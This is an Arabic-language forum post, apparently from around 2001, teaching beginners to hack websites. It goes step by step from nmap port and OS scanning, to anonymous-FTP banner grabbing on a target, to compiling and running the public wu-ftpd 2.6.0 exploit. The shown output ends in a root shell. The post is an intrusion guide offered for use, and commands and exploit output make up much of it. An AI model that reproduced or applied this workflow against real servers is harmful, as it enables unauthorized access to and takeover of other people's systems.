السلام عليكم و رحمة الله و بركاته :)
بسم الله ابدأ......
الموضوع للمبتدئين و هو يتكلم عن بعض اساسيات الاختراق :)
الادوات المطلوبه : شيل اكاونت ...اذا بحثت في جوجل سوف تجد الكثير من الشيلز
طبعا الناس المحترمه (احمممم) بتركب لينكس او يونيكس و تعيش حياتها و تريح 
نفسها...في ناس تانيه ماتحبش اللينكس فالشيل اكاونت كويس لها و ممكن يمشي
انا عن نفسي مش حاستعمل الاتنين :)
بس بالنسبه للي حيستعملو الشيل لازم يتاكدو انه بيسمح بالبرامج الاساسيه زي
nslookup, host, dig, ping, traceroute,telnet, ssh, ftp
و اساسي لازم ال gcc عشان تعرف تعمل كومبايل...(يا عم ركب لينكس و ريح نفسك )
و طبعا الادوات دي nmap and netcat و اخر حاجه هي الاكسبلويت .
*بعض الملحوظات الهامه :
1-الشيل اكاونت شبيه جدا بالدوس مع اختلاف في الاوامر و الوظائف ..مش حناقش كيفيه 
الحصول على واحد لان فيه مواضيع كثيره اتكلمت عليه.
2- اداه ال nmap هي عباره عن بورت سكانر متقدم
3- ال NetCat هي اداه شبيه بالتلنت و تقوم برفع بيانات لسيرفير معين
4-الاكسبلويتات هي عباره عن برامج غالبا تكون مكتوبه بلغه السي و هي تقوم 
باعطائك كافه الصلاحيات فهي تخترق جهاز معين و تقوم بعمل كل شيء انت تريده
ممكن تلاقيها فين؟؟؟
مواقع السيكيوريتي على افه من يشيل...دور و لو مالقيتش قولي و انا اديلك كام موقع
تجيب منه الحاجات دي....
*المواقع المرتبطه بالموضوع :
a) Linux (http://www.slackware.com)
b) Nmap (http://www.insecure.org)
c) NetCat (http://www.l0pht.com/~weld/netcat/)

الخطوات :-
1- ركب الينكس و خش عالنت (مش قلتلك مفيش احسن من اللينكس :P )
2- ركب الاداه nmap متبعا التالي :
*1) tar zxvf nmap.tar.gz
2) cd nmap
3) ./configure && make && make install

3-شوف الموقع المستهدف و ليكن ..
www.target.com
4- شوف الاي بي تبع الموقع باستخدام 

nslookup www.target.com

هذا سوف يعرض لك الاي بي للموقع و ليكن 196.1.2.3
5- شوف الخدمات اللي بيقدمها الموقع و كمان شوف نظام التشغيل متبعا التالي :-

"nmap -sS -O 196.1.2.3"

المفروض انه يديك مخرجات شبه الكلام ده :-
root@IcEr:~# nmap -sS -O 196.1.2.3
Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )
Interesting ports on www.target.com (196.1.2.3):
(The 1531 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
111/tcp open sunrpc
113/tcp open auth
515/tcp open printer
963/tcp open unknown
1024/tcp open kdm
4444/tcp filtered krb524
6000/tcp open X11
6699/tcp filtered napster
OS guess for host: Linux 2.2.14-2.2.16
Uptime 0.160 days (since Mon Apr 30 14:51:06 2001)
Nmap run completed -- 1 IP address (1 host up) scanned in 67 seconds
root@IcEr:~#




تمام كده يا شباب :)
نكمل...
الكلام ده كله عباره عن استكشاف للموقع يوريك البورتات المفتوحه..ممكن تشوف لو كان فيه FTP daemon
شغال على الموقع و لا لا في المثال اللي فوق حنلاقيه موجود و ده كويس
شوف اي فيرجين من FTP daemon موجوده متبعا التالي :-
"telnet 196.1.2.3 21"
او
"ftp 196.1.2.3"
اي منهم حيديك بانر فيه الفيرجين بتاعه الاف تي بي ديمون اللي شغاله على السيرفير
ممكن يكون زي كده :

root@IcEr:~# ftp 196.1.2.3
Connected to 196.1.2.3.
220 www.target.com FTP server (Version wu-2.6.0(1) Mon Mar 6 13:54:16 SAST 2000)
ready.
Name (target:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to root@IcEr.pandora.net
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>by
root@IcEr:~#

من الكلام ده تقدر تعرف ان الفيرجين الموجوده هي wu-2.6.0.
و ايضا احنا حاولنا نخش كمجهولين anonymous و كانت اعمليه ناجحه ;)
####### صلي على الحبيب المختار #######

7 او 8 مش فاكر المهم انها اهم خطوه :-
احصل على الاكسبلويت بتاعه الفيرجين ديه من FTPd.
(اللي يعمل سيرش ميتوهش )
و لتكن wuftpd2600.c
المهم لو شفت السورس كود بتاعها حتلاقي انها متكوده عشان نظام تشغيل معين و ليكن red hat 6.2
و يا سلام لو كان الموقع المستهدف بيعمل على نظام التشغيل ده 
كده يبقى كل اللي تعمله انك تعمل كومبايل للثغره دي و بشغلها على سيرفر 
الموقع المستهدف و كده حيديك root access
;-)
root@IcEr:~/# ./wuftpd2600 -t -s 0 196.1.2.3
Target: 196.1.2.3 (ftp/<shellcode>): RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152
loggin into system..
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS <shellcode>
230-Next time please use your e-mail address as your password
230- for example: icer@ae.net
230 Guest login ok, access restrictions apply.
STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]
STEP 3 : Checking if we can reach our return address by format string
STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now)
STEP 5 : Sending code.. this will take about 10 seconds.
Press ^\ to leave shell
Linux lame_box.za.net 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
Bang! You have root!


طبعا انا نسيت امر الكومبايل ..شوف الامر ده 
man gcc
و هوه حيديلك معلومات كامله عن امر الكومبايل ..بكل الخيارات اللي معاه
كده يبقى انا كده عملت اللي عليه :)
محدش يسالني باه بعد كده و يقولي ياواد يا ايسر اعمل ايه
search..U will find what U wanna
طيب ...اه نسيت ..محدش سالني اعمل بالنت كات بعد كده ..بعض الثغرات بتحتاجه..
لو لاحظت اننا استغلينا خاصيه ال annonymous الموجوده ..لاكن لو كانت الخاصيه
دي مش موجوده ..يبقى مش حنعرف نكمل الكلام ده
عشان الاكسبلويت مش تشتغل ..في هذه الحاله الاكسبلويت مش تشتغل الا لو معانا باسورد و يوزر نيم
عشان نخش على الاف تي بي بتاع الموقع..
عشان كده لازم تقرا السورس بتاع الاكسبلويت..و كل اكسبلويت لها ساينتكس و شغل
خاص بيها..بس المبادئ الاساسيه و احده 


ديه كانت فكره عامه عن اختراق المواقع بالطريقه ديه
و على فكره انا مترجم الموضوع ده علشان مفيش حد زكي ييجي يقول
يا حرامي يا كذاب هاه....:(((
بس الاسلوب يمكن يكون مختلف شويه
يلا بأه مش عايزين حاجه ؟؟؟؟؟?????
اي استفسار انا حاضر و احب اشيد بموضوع الاخ linux freak في الرابط ده 
FOR WHO DONOT LIKE LINUX : 
http://www.ebnmasr.net/vb/showthread.php?s=&threadid=6895




اخوكم IcEr
d34d_c0w@hotmail.com

paltalk:icer4vb

COPYRIGHT TO THE TRANSLATOR
:)
BYE